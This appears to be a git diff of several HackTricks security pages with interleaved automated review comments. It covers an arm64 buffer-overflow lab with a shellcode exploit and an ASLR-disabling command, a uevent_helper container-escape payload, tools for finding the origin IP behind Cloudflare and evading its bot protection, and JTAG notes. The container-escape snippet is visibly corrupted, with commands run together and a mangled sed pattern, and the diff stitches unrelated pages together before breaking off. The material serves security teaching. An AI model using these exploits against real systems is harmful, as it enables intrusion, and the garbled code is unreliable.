||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
Find an introduction to arm64 in:
|
||||||
|
|
||||||
|
{% content-ref url="../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md" %}
|
||||||
|
[arm64-basic-assembly.md](../../../macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
## Code 
|
||||||
|
|
||||||
|
```c
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <unistd.h>
|
||||||
|
|
||||||
|
void vulnerable_function() {
|
||||||
|
char buffer[64];
|
||||||
|
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
|
||||||
|
}
|
||||||
|
|
||||||
|
int main() {
|
||||||
|
vulnerable_function();
|
||||||
|
return 0;
|
||||||
|
}
|
||||||
|
```
|
||||||
|
|
||||||
|
Compile without pie, canary and nx:
|
||||||
|
|
||||||
|
{% code overflow="wrap" %}
|
||||||
|
```bash
|
||||||
|
clang -o bof bof.c -fno-stack-protector -Wno-format-security -no-pie -z execstack
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
## No ASLR & No canary - Stack Overflow 
|
||||||
|
|
||||||
|
To stop ASLR execute:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||||||
|
```
|
||||||
|
|
||||||
|
To get the [**offset of the bof check this link**](../ret2win/ret2win-arm64.md#finding-the-offset).
|
||||||
|
|
||||||
|
Exploit:
|
||||||
|
|
||||||
|
```python
|
||||||
|
from pwn import *
|
||||||
|
|
||||||
|
# Load the binary
|
||||||
|
binary_name = './bof'
|
||||||
|
elf = context.binary = ELF(binary_name)
|
||||||
|
|
||||||
|
# Generate shellcode
|
||||||
|
shellcode = asm(shellcraft.sh())
|
||||||
|
|
||||||
|
# Start the process
|
||||||
|
p = process(binary_name)
|
||||||
|
|
||||||
|
# Offset to return address
|
||||||
|
offset = 72
|
||||||
|
|
||||||
|
# Address in the stack after the return address
|
||||||
|
ret_address = p64(0xfffffffff1a0)
|
||||||
|
|
||||||
|
# Craft the payload
|
||||||
|
payload = b'A' * offset + ret_address + shellcode
|
||||||
|
|
||||||
|
print("Payload length: "+ str(len(payload)))
|
||||||
|
|
||||||
|
# Send the payload
|
||||||
|
p.send(payload)
|
||||||
|
|
||||||
|
# Drop to an interactive session
|
||||||
|
p.interactive()
|
||||||
|
```
|
||||||
|
|
||||||
|
The only "complicated" thing to find here would be the address in the stack to call. In my case I generated the exploit with the address found using gdb, but then when exploiting it it didn't work (because the stack address changed a bit).
|
||||||
|
|
||||||
|
I opened the generated **`core` file** (`gdb ./bog ./core`) and checked the real address of the start of the shellcode.
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
||||||
|
Other ways to support HackTricks:
|
||||||
|
|
||||||
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
|
</details>
|
|
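Review bot: the gdb invocation in the closing paragraph, `gdb ./bog ./core`, names a binary that does not exist in this walkthrough; the script sets `binary_name = './bof'`, so this should read `gdb ./bof ./core`. Separately, the comment `# Address in the stack after the return address` above `ret_address = p64(0xfffffffff1a0)` does not say that this value came from the author's own run, while the paragraph below explains that it had to be re-read from the core file because the stack address had shifted; moving that caveat into the comment (e.g. `# Stack address of the shellcode, taken from the core dump; differs per environment`) would stop readers copying the constant as-is.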
@ -14,7 +14,7 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
{% embed url="https://websec.nl/" %}
|
{% embed url="https://websec.nl/" %}
|
||||||
|
|
||||||
|
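Review bot: the new `src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif"` ties the figure to a file sitting exactly four directories deep, whereas the old root-relative `/.gitbook/assets/...` did not; if the page is ever moved the image breaks silently. If the relative form is required by the renderer, say so in the commit message; otherwise keep the root-relative path. The `{% embed url="https://websec.nl/" %}` lines are unchanged and fine.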
@ -138,23 +138,23 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
|
||||||
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
|
* Writing to `/sys/kernel/uevent_helper` can execute arbitrary scripts upon `uevent` triggers.
|
||||||
* **Example for Exploitation**: %%%bash
|
* **Example for Exploitation**: %%%bash
|
||||||
|
|
||||||
## Creates a payload
|
### Creates a payload
|
||||||
|
|
||||||
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
|
echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper
|
||||||
|
|
||||||
## Finds host path from OverlayFS mount for container
|
### Finds host path from OverlayFS mount for container
|
||||||
|
|
||||||
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
|
host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)
|
||||||
|
|
||||||
## Sets uevent\_helper to malicious helper
|
### Sets uevent\_helper to malicious helper
|
||||||
|
|
||||||
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
|
echo "$host\_path/evil-helper" > /sys/kernel/uevent\_helper
|
||||||
|
|
||||||
## Triggers a uevent
|
### Triggers a uevent
|
||||||
|
|
||||||
echo change > /sys/class/mem/null/uevent
|
echo change > /sys/class/mem/null/uevent
|
||||||
|
|
||||||
## Reads the output
|
### Reads the output
|
||||||
|
|
||||||
cat /output %%%
|
cat /output %%%
|
||||||
|
|
||||||
|
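Review bot: changing `## Creates a payload` to `### Creates a payload` (and the same for the four other heading lines) treats a symptom: these lines were shell comments (`# Creates a payload`) inside a snippet that is delimited with `%%%bash ... %%%` instead of a proper fenced block, so Markdown renders the `#` comments as headings and the commands run together. The same breakage is visible in `echo "#!/bin/sh" > /evil-helper echo "ps > /output" >> /evil-helper chmod +x /evil-helper`, which is three commands collapsed onto one line with no separators, and in `host\_path=$(sed -n 's/._\perdir=(\[^,]_).\*/\1/p' /etc/mtab)`, where the `*` characters of the sed pattern have become `_` (Markdown italics) and stray backslashes were added. Suggest dropping the heading change and putting the whole snippet back into a triple-backtick `bash` fence with `#` comments, one command per line, and the sed expression restored from the original source.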
@ -187,7 +187,7 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
|
||||||
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
|
* [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc\_group\_understanding\_hardening\_linux\_containers-1-1.pdf)
|
||||||
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
|
* [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container\_whitepaper.pdf)
|
||||||
|
|
||||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../../.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
{% embed url="https://websec.nl/" %}
|
{% embed url="https://websec.nl/" %}
|
||||||
|
|
||||||
|
|
|
@ -285,6 +285,7 @@ Tools:
|
||||||
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
|
* [https://github.com/google/fuzzing/tree/master/dictionaries](https://github.com/google/fuzzing/tree/master/dictionaries)
|
||||||
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
|
* [https://github.com/six2dez/OneListForAll](https://github.com/six2dez/OneListForAll)
|
||||||
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
|
* [https://github.com/random-robbie/bruteforce-lists](https://github.com/random-robbie/bruteforce-lists)
|
||||||
|
* [https://github.com/ayoubfathi/leaky-paths](https://github.com/ayoubfathi/leaky-paths)
|
||||||
* _/usr/share/wordlists/dirb/common.txt_
|
* _/usr/share/wordlists/dirb/common.txt_
|
||||||
* _/usr/share/wordlists/dirb/big.txt_
|
* _/usr/share/wordlists/dirb/big.txt_
|
||||||
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
|
* _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
|
||||||
|
|
|
@ -9,12 +9,11 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
## Common Techniques to Uncover Cloudflare
|
## Common Techniques to Uncover Cloudflare
|
||||||
|
|
||||||
* You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
|
* You can use some service that gives you the **historical DNS records** of the domain. Maybe the web page is running on an IP address used before.
|
||||||
|
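Review bot: the link text `@carlospolopm` in the Twitter bullet does not match its destination `https://twitter.com/hacktricks_live`; the first footer on this page already uses `@hacktricks\_live` for the same URL, so the text should be aligned with it. This hunk only escapes the underscore (`hacktricks\_live`) and removes a blank line, leaving the mismatch in place; the same applies to the identical footer hunks further down.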
@ -30,6 +29,7 @@ Other ways to support HackTricks:
|
||||||
* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)
|
* Search for the domain inside [http://www.crimeflare.org:82/cfs.html](http://www.crimeflare.org:82/cfs.html) or [https://crimeflare.herokuapp.com](https://crimeflare.herokuapp.com). Or use the tool [CloudPeler](https://github.com/zidansec/CloudPeler) (which uses that API)
|
||||||
* Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
|
* Search for the domain in [https://leaked.site/index.php?resolver/cloudflare.0/](https://leaked.site/index.php?resolver/cloudflare.0/)
|
||||||
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
|
* [**CloudFlair**](https://github.com/christophetd/CloudFlair) is a tool that will search using Censys certificates that contains the domain name, then it will search for IPv4s inside those certificates and finally it will try to access the web page in those IPs.
|
||||||
|
* [**CloakQuest3r**](https://github.com/spyboy-productions/CloakQuest3r): CloakQuest3r is a powerful Python tool meticulously crafted to uncover the true IP address of websites safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service. Its core mission is to accurately discern the actual IP address of web servers that are concealed behind Cloudflare's protective shield.
|
||||||
* [Censys](https://search.censys.io/)
|
* [Censys](https://search.censys.io/)
|
||||||
* [Shodan](https://shodan.io/)
|
* [Shodan](https://shodan.io/)
|
||||||
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
|
* [Bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history)
|
||||||
|
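Review bot: the added CloakQuest3r bullet pastes promotional README wording ("powerful Python tool meticulously crafted", "protective shield") and is grammatically off ("safeguarded by Cloudflare and other alternatives, a widely adopted web security and performance enhancement service"); the surrounding bullets are one-line tool descriptions, so trim it to what the tool does, e.g. `[CloakQuest3r](https://github.com/spyboy-productions/CloakQuest3r): Python tool that tries to find the origin IP of a Cloudflare-fronted site`, matching the style of the CloudFlair entry above it.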
@ -125,10 +125,11 @@ Use a headless browser that isn't deetcted as an automated browser (you might ne
|
||||||
**Smart proxies** proxies are continuously updated by specialized companies, aiming to outmaneuver Cloudflare's security measures (as thats their business).
|
**Smart proxies** proxies are continuously updated by specialized companies, aiming to outmaneuver Cloudflare's security measures (as thats their business).
|
||||||
|
|
||||||
Som of them are:
|
Som of them are:
|
||||||
* [ScraperAPI](https://www.scraperapi.com/?fp_ref=scrapeops)
|
|
||||||
|
* [ScraperAPI](https://www.scraperapi.com/?fp\_ref=scrapeops)
|
||||||
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
|
* [Scrapingbee](https://www.scrapingbee.com/?fpr=scrapeops)
|
||||||
* [Oxylabs](https://oxylabs.go2cloud.org/aff_c?offer_id=7&aff_id=379&url_id=32)
|
* [Oxylabs](https://oxylabs.go2cloud.org/aff\_c?offer\_id=7\&aff\_id=379\&url\_id=32)
|
||||||
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/[p_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) are noted for their proprietary Cloudflare bypass mechanisms.
|
* [Smartproxy](https://prf.hn/click/camref:1100loxdG/\[p\_id:1100l442001]/destination:https%3A%2F%2Fsmartproxy.com%2Fscraping%2Fweb) are noted for their proprietary Cloudflare bypass mechanisms.
|
||||||
|
|
||||||
For those seeking an optimized solution, the [ScrapeOps Proxy Aggregator](https://scrapeops.io/proxy-aggregator/) stands out. This service integrates over 20 proxy providers into a single API, automatically selecting the best and most cost-effective proxy for your target domains, thus offering a superior option for navigating Cloudflare's defenses.
|
For those seeking an optimized solution, the [ScrapeOps Proxy Aggregator](https://scrapeops.io/proxy-aggregator/) stands out. This service integrates over 20 proxy providers into a single API, automatically selecting the best and most cost-effective proxy for your target domains, thus offering a superior option for navigating Cloudflare's defenses.
|
||||||
|
|
||||||
|
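Review bot: the hunk moves the ScraperAPI bullet below a blank line and escapes `_`, `&` and `[` in the affiliate URLs, but leaves three visible typos untouched in both columns: `**Smart proxies** proxies` (doubled word), `as thats their business` (missing apostrophe) and `Som of them are:`. Since these lines are already in the hunk, fix them here. Also confirm that the renderer decodes `\&` back to `&` in the Oxylabs destination, otherwise `offer\_id=7\&aff\_id=379` produces a broken link.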
@ -142,8 +143,6 @@ Reverse engineering Cloudflare's anti-bot measures is a tactic used by smart pro
|
||||||
|
|
||||||
Find more info about how to do this in the [original article](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/).
|
Find more info about how to do this in the [original article](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/).
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
## References
|
## References
|
||||||
|
|
||||||
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
|
* [https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/](https://scrapeops.io/web-scraping-playbook/how-to-bypass-cloudflare/)
|
||||||
|
@ -157,7 +156,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -1,4 +1,4 @@
|
||||||
|
# Hardware Hacking
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
@ -9,15 +9,12 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## JTAG
|
||||||
#
|
|
||||||
|
|
||||||
# JTAG
|
|
||||||
|
|
||||||
JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
|
JTAG allows to perform a boundary scan. The boundary scan analyzes certain circuitry, including embedded boundary-scan cells and registers for each pin.
|
||||||
|
|
||||||
|
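Review bot: demoting `# JTAG` to `## JTAG` and dropping the stray lone `#` line is right, since the page title `# Hardware Hacking` should be the only H1; the hunk leaves the first sentence `JTAG allows to perform a boundary scan.` untouched, which should read `JTAG allows performing a boundary scan.` (or `JTAG makes it possible to perform a boundary scan.`).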
@ -34,7 +31,7 @@ It can also support other commands such as:
|
||||||
|
|
||||||
You might come across these instructions when you use a tool like the JTAGulator.
|
You might come across these instructions when you use a tool like the JTAGulator.
|
||||||
|
|
||||||
## The Test Access Port
|
### The Test Access Port
|
||||||
|
|
||||||
Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
|
Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a general-purpose port that provides **access to the JTAG test support** functions built into a component. TAP uses the following five signals:
|
||||||
|
|
||||||
|
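Review bot: the paragraph under the renamed `### The Test Access Port` describes TAP as a `four-wire` port and then says `TAP uses the following five signals`; these lines are in the hunk's context, so reconcile the count (say which of the five signals is optional, if that is what is meant) rather than leaving the contradiction.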
@ -46,7 +43,7 @@ Boundary scans include tests of the four-wire **Test Access Port (TAP)**, a gene
|
||||||
|
|
||||||
Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
|
Sometimes you will be able to find those pins marked in the PCB. In other occasions you might need to **find them**.
|
||||||
|
|
||||||
## Identifying JTAG pins
|
### Identifying JTAG pins
|
||||||
|
|
||||||
The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
|
The fastest but most expensive way to detect JTAG ports is by using the **JTAGulator**, a device created specifically for this purpose (although it can **also detect UART pinouts**).
|
||||||
|
|
||||||
|
@ -58,13 +55,12 @@ Using **JTAGenum**, you’d first **define the pins of the probing** device that
|
||||||
|
|
||||||
A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
|
A **third way** to identify JTAG pins is by **inspecting the PCB** for one of the pinouts. In some cases, PCBs might conveniently provide the **Tag-Connect interface**, which is a clear indication that the board has a JTAG connector, too. You can see what that interface looks like at [https://www.tag-connect.com/info/](https://www.tag-connect.com/info/). Additionally, inspecting the **datasheets of the chipsets on the PCB** might reveal pinout diagrams that point to JTAG interfaces.
|
||||||
|
|
||||||
# SDW
|
## SDW
|
||||||
|
|
||||||
SWD is an ARM-specific protocol designed for debugging.
|
SWD is an ARM-specific protocol designed for debugging.
|
||||||
|
|
||||||
The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
|
The SWD interface requires **two pins**: a bidirectional **SWDIO** signal, which is the equivalent of JTAG’s **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK** in JTAG. Many devices support the **Serial Wire or JTAG Debug Port (SWJ-DP)**, a combined JTAG and SWD interface that enables you to connect either a SWD or JTAG probe to the target.
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
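Review bot: the heading is changed from `# SDW` to `## SDW`, but the protocol is SWD (the body says `SWD is an ARM-specific protocol`), so the new heading should be `## SWD`. In the same hunk, `a bidirectional **SWDIO** signal, which is the equivalent of JTAG's **TDI and TDO pins and a clock**, and **SWCLK**, which is the equivalent of **TCK**` misplaces `and a clock`; it reads correctly as `...the equivalent of JTAG's TDI and TDO pins, and a clock, SWCLK, which is the equivalent of TCK in JTAG`.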
@ -74,9 +70,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
|
||||||
|
|
|
@ -9,7 +9,7 @@ Other ways to support HackTricks:
|
||||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -105,17 +105,21 @@ You won't find HackTricks filled with annoying ads like other blogs with much le
|
||||||
* **What should I do if there is content from my blog in HackTricks and I don't want it there?**
|
* **What should I do if there is content from my blog in HackTricks and I don't want it there?**
|
||||||
{% endhint %}
|
{% endhint %}
|
||||||
|
|
||||||
In any case know that HackTricks in this case would be improving your **SEO** and **encouraging** people to **check your page** (people has mentioned us that since some page of them is in HackTricks they receive more visits). If you still want the content of your blog to be removed from HackTricks let us know.
|
Note that having links to your page in HackTricks:
|
||||||
|
|
||||||
Note that asking this we will definitely **remove every link to your blog**, and any content based on it.
|
* Improve your **SEO**
|
||||||
|
* The content gets **translated to more than 15 languages** making possible for more people to access this content
|
||||||
|
